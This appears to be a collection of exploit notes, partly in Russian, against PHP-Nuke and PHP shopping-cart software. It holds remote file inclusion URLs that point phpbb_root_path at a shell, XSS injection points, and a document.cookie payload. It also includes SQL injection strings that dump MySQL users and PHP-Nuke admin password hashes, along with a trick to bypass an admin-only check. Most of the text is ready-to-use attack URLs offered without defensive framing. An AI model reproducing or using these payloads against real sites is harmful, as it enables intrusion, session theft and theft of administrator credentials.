http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?

XSS

Версии:
PHP-Nuke 7.3
PHP-Nuke 7.2
PHP-Nuke 7.1
PHP-Nuke 7.0 FINAL
PHP-Nuke 7.0
PHP-Nuke 6.9
PHP-Nuke 6.7
PHP-Nuke 6.6
PHP-Nuke 6.5 RC3
PHP-Nuke 6.5 RC2
PHP-Nuke 6.5 RC1
PHP-Nuke 6.5 FINAL
PHP-Nuke 6.5 BETA 1
PHP-Nuke 6.5
PHP-Nuke 6.0


http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]
http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss
code here]
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss
code here]&month=05&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss
code here]&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss
code here]
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss
code here]&order=0&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]
http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>

Calloway's_Cart_Pro_v.2.1b
Sql-injection
/ccsearch.php

<form name="form" action="ccsearch.php" method="get">
<input type="text" name="results" />
<input type="submit" name="Submit" value="Search" />
</form>
$var = @$_GET['results'] ;
$trimmed = trim($var);
$limit=5;
//Н-ко строк спустя).
mysql_connect($dbhost,$dbuname,$dbpass);
mysql_select_db("$dbname") or die("Unable to select database");
$query = "SELECT * FROM CCart_products where name like '%$trimmed%'";
$numresults=mysql_query($query);

Exploit

/ccsearch?reuslts=1+union+select+user+from+mysql.us ers/*

Product: Module: UserControl
Author: pattidor@mail.ru
Version: V.1.0

Blind-SQL

file: admin/modules/usercontrol.php
В самом начале файла,защита:

if (!eregi("admin.php", $_SERVER['PHP_SELF'])) { die ("Access Denied"); }
global $prefix, $db;
$aid = substr("$aid", 0,25);
$row = $db->sql_fetchrow($db->sql_query("SELECT radminsuper FROM " . $prefix . "_authors WHERE aid='$aid'"));
if ($row['radminsuper'] == 1) {
$module_name = "usercontrol";
get_lang($module_name);

Тоесть,вызвать скрипт можно только из админки.Простой и элегантный обход (:
Вызываем скрипт,например так:
target: http://example.com/admin/modules/usercontrol.php//admin.php?prefix={SQL}
Пробывал на никсах и окошках - прошло на ура.
Далее, $aid Как видим урезаеться до 25 символов.Если уложитесь - крутите через нее.Если нет - то есть еще $prefix :)

# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]

Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*

Example2: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*